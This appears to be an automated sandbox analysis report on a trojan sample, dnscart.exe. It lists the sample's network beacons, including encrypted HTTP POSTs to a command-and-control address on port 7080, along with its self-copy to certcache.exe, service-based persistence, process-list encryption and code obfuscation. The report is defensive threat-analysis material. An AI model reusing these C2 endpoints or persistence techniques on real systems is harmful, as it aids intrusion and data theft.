Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 178.32.255.132:7080Content-Length: 308Connection: Keep-AliveCache-Control: no-cacheData Raw: 95 73 06 ac 88 ab 6d 88 1c 42 8b 42 cc fe 00 d8 b2 75 14 4f 5e 86 02 fb e1 ee 3c ac eb ad bd 9c a7 a9 2f 7d 11 2b 58 78 52 fb c0 9a 7d 6d 86 ed f1 e4 b5 49 16 26 4d 18 e6 56 39 2a 6d b6 0a 29 8a 5c fc 58 bd de f7 ef df 89 c0 35 9c a5 ea 14 c7 e3 31 55 cd 15 41 f7 b0 a5 11 2c eb 9e f3 ec 26 7a d3 9b bb 09 89 f4 a6 8e 67 8f 41 55 b5 90 b8 25 69 18 54 86 d2 24 7a 3d c2 0d 20 f6 a1 1a 68 47 09 78 33 21 ea 2e e1 62 dd e8 1b e8 7f 18 be cb 9b 0c 90 4a f3 11 45 b6 43 8e 2b 93 b7 82 76 af df fb b3 95 9e 81 b1 de 43 27 d1 b0 f6 9e 85 a8 b5 27 dc ec 3e bf 18 15 f5 26 3f 37 26 69 58 fa ea 53 c2 b9 64 e2 55 d6 ac 08 c1 14 66 cd 82 97 a2 1a 5c b9 b1 5d 0a fc 0c 38 82 f2 17 30 81 16 27 e4 11 75 c1 3e 44 fc 39 91 0

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.2.2:49158 -> 69.16.193.12:4143
Source: global traffic	TCP traffic: 192.168.2.2:49159 -> 178.32.255.132:7080

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49158 -> 4143
Source: unknown	Network traffic detected: HTTP traffic on port 49159 -> 7080

Boot Survival:

Contains functionality to start windows services

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Code function: 2_2_00229960 StartServiceW,CloseServiceHandle,CloseServiceHandle,

2_2_00229960

Stealing of Sensitive Information:

Encrypts process information

Show sources

Source: C:\Windows\SysWOW64\certcache.exe	Data encrypted: 216554_6C0D37D2%*WmiApSrv.exe,conhost.exe,WmiPrvSE.exe,explorer.exe,taskeng.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],2:
Source: C:\Windows\SysWOW64\certcache.exe	Data encrypted: 216554_6C0D37D2%*mscorsvw.exe,WmiApSrv.exe,conhost.exe,WmiPrvSE.exe,explorer.exe,taskeng.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],2:

Persistence and Installation Behavior:

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

PE file moved: C:\Windows\SysWOW64\certcache.exe

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\certcache.exe

Executable created and started: C:\Windows\SysWOW64\certcache.exe

Data Obfuscation:

Binary may include packed or encrypted code

Show sources

Source: initial sample

Static PE information: section name: .text entropy: 7.10790918737

PE file contains an invalid checksum

Show sources

Source: dnscart.exe

Static PE information: real checksum: 0x1 should be: 0x2d77f

PE file contains sections with non-standard names

Show sources

Source: dnscart.exe

Static PE information: section name: 6xOsN5y

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Code function: 1_2_00A1572F push ebp; retf	1_2_00A15738
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 1_2_00A14ABA push ebp; ret	1_2_00A14AC4
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 1_2_00A147E4 push 00000048h; iretd	1_2_00A147E6
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00320116 push ebp; iretd	8_2_00320118
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00328C69 push ss; retf 0018h	8_2_00328C6C
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00331FAA pushad ; retn 0035h	8_2_003323D1
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003256E8 pushad ; retf	8_2_003256E9
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0033C968 push eax; iretd	8_2_0033C9B1
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0033CB42 push eax; retf 0033h	8_2_0033CC39
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0033C95A push eax; retf 0033h	8_2_0033C961
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00326AE8 pushad ; retf	8_2_00326AE9
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0032F218 pushad ; retf	8_2_0032F219
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0032E5A8 pushad ; retf	8_2_0032E5A9
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00356558 pushad ; retf	8_2_00356559
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0035B54A pushad ; iretd	8_2_0035B881
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003520B0 pushad ; iretd	8_2_003521D9
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003521DA push ebp; iretd	8_2_00352289
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00392989 push E9448A66h; retf	8_2_0039298E
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003BA01D pushad ; retf 003Bh	8_2_003BA0A9
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003A294A pushfd ; ret	8_2_003A2C72

System Summary:

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: dnscart.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Show sources

Source: dnscart.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Show sources

Source:	Binary string: FntCache.pdb source: svchost.exe
Source:	Binary string: wow64win.pdb source: certcache.exe, mscorsvw.exe
Source:	Binary string: sppwinob.pdb source: sppsvc.exe
Source:	Binary string: FntCache.pdbH source: svchost.exe
Source:	Binary string: wow64cpu.pdb source: certcache.exe, mscorsvw.exe
Source:	Binary string: wow64.pdbH source: certcache.exe, mscorsvw.exe
Source:	Binary string: wow64win.pdbH source: certcache.exe, mscorsvw.exe
Source:	Binary string: sppobjs.pdb source: sppsvc.exe
Source:	Binary string: !!22ewW.pdb source: certcache.exe, dnscart.exe
Source:	Binary string: sppsvc.pdb source: sppsvc.exe
Source:	Binary string: wow64.pdb source: certcache.exe, mscorsvw.exe

Classification label

Show sources

Source: classification engine

Classification label: mal56.troj.winEXE@11/1@0/3

Contains functionality to create services

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Code function: CreateServiceW,		2_2_002297B3
Source: C:\Windows\SysWOW64\certcache.exe	Code function: CreateServiceW,		4_2_001397B3

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Code function: 1_2_001F214F CreateToolhelp32Snapshot,

1_2_001F214F

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Code function: 2_2_00229960 StartServiceW,CloseServiceHandle,CloseServiceHandle,

2_2_00229960

PE file has an executable .text section and no other executable section

Show sources

Source: dnscart.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Key opened: HKEY_USERS\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\dnscart.exe 'C:\Users\user\Desktop\dnscart.exe'
Source: unknown	Process created: C:\Users\user\Desktop\dnscart.exe C:\Users\user\Desktop\dnscart.exe
Source: unknown	Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe
Source: unknown	Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown	Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Users\user\Desktop\dnscart.exe	Process created: C:\Users\user\Desktop\dnscart.exe C:\Users\user\Desktop\dnscart.exe
Source: C:\Windows\SysWOW64\certcache.exe	Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Memory allocated: 77290000 page execute and read and write
Source: C:\Users\user\Desktop\dnscart.exe	Memory allocated: 77190000 page execute and read and write
Source: C:\Users\user\Desktop\dnscart.exe	Memory allocated: 77290000 page execute and read and write
Source: C:\Users\user\Desktop\dnscart.exe	Memory allocated: 77190000 page execute and read and write
Source: C:\Windows\SysWOW64\certcache.exe	Memory allocated: 77290000 page execute and read and write
Source: C:\Windows\SysWOW64\certcache.exe	Memory allocated: 77190000 page execute and read and write
Source: C:\Windows\SysWOW64\certcache.exe	Memory allocated: 77290000 page execute and read and write
Source: C:\Windows\SysWOW64\certcache.exe	Memory allocated: 77190000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	Memory allocated: 77290000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	Memory allocated: 77190000 page execute and read and write

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

Code function: 2_2_00222220 CreateProcessAsUserW,

2_2_00222220

Creates files inside the system directory

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

File created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat

Creates mutexes

Show sources

Source: C:\Windows\SysWOW64\certcache.exe	Mutant created: \BaseNamedObjects\M49C95F14
Source: C:\Users\user\Desktop\dnscart.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I6C0D37D2
Source: C:\Users\user\Desktop\dnscart.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M6C0D37D2
Source: C:\Windows\SysWOW64\certcache.exe	Mutant created: \BaseNamedObjects\Global\I6C0D37D2
Source: C:\Users\user\Desktop\dnscart.exe	Mutant created: \Sessions\1\BaseNamedObjects\M7DE44FFE

Deletes Windows files

Show sources

Source: C:\Users\user\Desktop\dnscart.exe

File deleted: C:\Windows\SysWOW64\certcache.exe:Zone.Identifier

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Code function: 1_2_001F2E6A	1_2_001F2E6A
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 1_2_001F2E6A	1_2_001F2E6A
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_00222E6A	2_2_00222E6A
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_00222E6A	2_2_00222E6A
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 3_2_001A2E6A	3_2_001A2E6A
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 3_2_001A2E6A	3_2_001A2E6A
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_00132E6A	4_2_00132E6A
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_00132E6A	4_2_00132E6A
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003323D8	8_2_003323D8
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00320F77	8_2_00320F77
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00336DC2	8_2_00336DC2
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0033C9B2	8_2_0033C9B2
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00336D26	8_2_00336D26
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0033CB42	8_2_0033CB42
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00336D2E	8_2_00336D2E
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0033B2F8	8_2_0033B2F8
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003573C8	8_2_003573C8
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0035228A	8_2_0035228A
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003520B0	8_2_003520B0
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0035307E	8_2_0035307E
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0035551A	8_2_0035551A
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00362D7D	8_2_00362D7D
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0038DB60	8_2_0038DB60
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0038D364	8_2_0038D364
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0038D329	8_2_0038D329
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_0038D378	8_2_0038D378
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003AE848	8_2_003AE848
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003AE838	8_2_003AE838
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003AE888	8_2_003AE888
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_003A294A	8_2_003A294A
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00332AE4	8_2_00332AE4
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00332924	8_2_00332924
Source: C:\Windows\System32\sppsvc.exe	Code function: 8_2_00332AEC	8_2_00332AEC

PE file contains executable resources (Code or Archives)

Show sources

Source: dnscart.exe

Static PE information: Resource name: RT_VERSION type: ump; VAX COFF executable not stripped - version 79

Reads the hosts file

Show sources

Source: C:\Windows\SysWOW64\certcache.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\certcache.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\certcache.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\certcache.exe	File read: C:\Windows\System32\drivers\etc\hosts

Sample file is different than original file name gathered from version info

Show sources

Source: dnscart.exe	Binary or memory string: OriginalFilenamewow64.dllj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewow64lg2.dllj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewow64cpu.dllj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWinInit.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameuser32j% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameservices.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewship6.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewshqos.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametzres.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSpTip.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameaero.msstyles.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskhost.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: originalfilename vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamej% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamedwm.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskeng.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameesrb.dll.muiH vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamestobject.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameAltTab.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewscui.cpl.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametquery.dll.mui@ vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameesent.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametwext.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamempr.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMSHTML.DLL.MUIV vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSHSVCS.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskmgr.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSndVolSSO.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewin32spl.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameinetpp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameadvapi32.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameprovsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameIEFRAME.DLL.MUIV vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamep2pcollab.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameQAgentRT.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameDhcpQEC.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenlasvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenapinsp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamepnrpnsp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFVEUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamews2_32.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameiphlpapi.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewow64.dllj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewow64lg2.dllj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewow64cpu.dllj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: System.OriginalFileName vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWinInit.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameuser32j% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameservices.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewship6.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamewshqos.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametzres.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameSpTip.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameaero.msstyles.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenametaskhost.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: originalfilename vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamej% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamedwm.exe.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs dnscart.exe
Source: dnscart.exe	Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs dnscart.exe
